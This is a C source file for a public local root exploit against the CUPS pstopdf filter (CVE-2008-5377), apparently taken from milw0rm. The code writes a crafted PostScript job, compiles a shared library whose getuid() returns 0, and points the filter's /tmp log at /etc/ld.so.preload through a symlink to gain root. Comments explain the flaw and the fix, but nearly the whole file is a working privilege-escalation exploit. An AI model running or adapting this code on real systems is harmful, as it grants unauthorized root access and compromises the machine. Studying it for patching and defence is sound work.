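/*
 * cve-2008-5377.c
 *
 * CUPS < 1.3.8-4 pstopdf filter exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Usage:
 *
 *   $ gcc cve-2008-5377.c -o cve-2008-5377
 *   $ ./cve-2008-5377
 *   $ id
 *   uid=0(root) gid=1000(vm) ...
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
 *
 * pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
 * a symlink attack on the /tmp/pstopdf.log temporary file.
 *
 * Operation:
 *
 * The exploit creates and prints a malformed postscript document that will
 * cause the CUPS pstopdf filter to write an error message out to its log
 * file that contains the string /tmp/getuid.so. However, since we also
 * symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
 * error message and malicious shared library path will be appended to the
 * ld.so.preload file, allowing us to elevate privileges to root.
 *
 * Note:
 *
 * This exploit only works under the (rare) conditions that cupsd executes
 * external filters as a privileged user, a printer on the system uses the
 * pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload
 * must be world readable.
 *
 * Root cause, for the record: the filter opened a fixed, predictable name in
 * a world-writable directory and wrote through whatever was already there.
 * The code-level fix is a per-run unique file created with O_EXCL (mkstemp()),
 * and the structural fix is not running print filters with elevated privileges.
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

/*
 * Non-zero when a system(3) return value does not denote a clean zero exit:
 * the shell could not be spawned (-1), the child died from a signal, or it
 * exited non-zero.  WEXITSTATUS() is only meaningful once WIFEXITED() holds,
 * so testing it alone misreports a failed spawn.
 */
static int
cmd_failed(int ret)
{
	return ret == -1 || !WIFEXITED(ret) || WEXITSTATUS(ret) != 0;
}

/*
 * Entry point.  Stages the PostScript job and the preload library source,
 * plants the symlink, submits the job, then removes the two staging files.
 * Diagnostics go to stderr; the exit status is EXIT_SUCCESS only when every
 * step succeeded, EXIT_FAILURE otherwise.
 */
int
main(void)
{
	int status = EXIT_FAILURE;
	int ret;
	FILE *fp;
	struct stat st;

	/* The bad token in this job is what the filter echoes into its log. */
	fp = fopen("/tmp/cve-2008-5377.ps", "w");
	if (!fp) {
		fprintf(stderr, "error: cannot open /tmp/cve-2008-5377.ps\n");
		goto cleanup;
	}
	fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
	/* fclose() flushes the buffer; a write error surfaces here, not at fprintf(). */
	if (fclose(fp) != 0) {
		fprintf(stderr, "error: cannot write /tmp/cve-2008-5377.ps\n");
		goto cleanup;
	}

	fp = fopen("/tmp/getuid.c", "w");
	if (!fp) {
		fprintf(stderr, "error: cannot open /tmp/getuid.c\n");
		goto cleanup;
	}
	fprintf(fp, "int getuid(){return 0;}\n");
	if (fclose(fp) != 0) {
		fprintf(stderr, "error: cannot write /tmp/getuid.c\n");
		goto cleanup;
	}

	ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
	if (cmd_failed(ret)) {
		fprintf(stderr, "error: cannot compile /tmp/getuid.c\n");
		goto cleanup;
	}

	/* Refuse to continue if the name is still taken after unlink(). */
	unlink("/tmp/pstopdf.log");
	ret = stat("/tmp/pstopdf.log", &st);
	if (ret != -1) {
		fprintf(stderr, "error: /tmp/pstopdf.log already exists\n");
		goto cleanup;
	}

	/*
	 * This is the vulnerable pattern being abused: the filter opens a fixed
	 * path in a shared, world-writable directory without O_EXCL, so it writes
	 * through whatever the path points at.  mkstemp() or O_CREAT|O_EXCL on the
	 * filter's side would have made this step fail.
	 */
	ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
	if (ret == -1) {
		fprintf(stderr, "error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
		goto cleanup;
	}

	ret = system("lp < /tmp/cve-2008-5377.ps");
	if (cmd_failed(ret)) {
		fprintf(stderr, "error: could not print /tmp/cve-2008-5377.ps\n");
		goto cleanup;
	}

	status = EXIT_SUCCESS;

cleanup:
	/* Only the two staging files are removed; the symlink and the .so are left in place. */
	unlink("/tmp/cve-2008-5377.ps");
	unlink("/tmp/getuid.c");
	return status;
}

// milw0rm.com [2008-12-22]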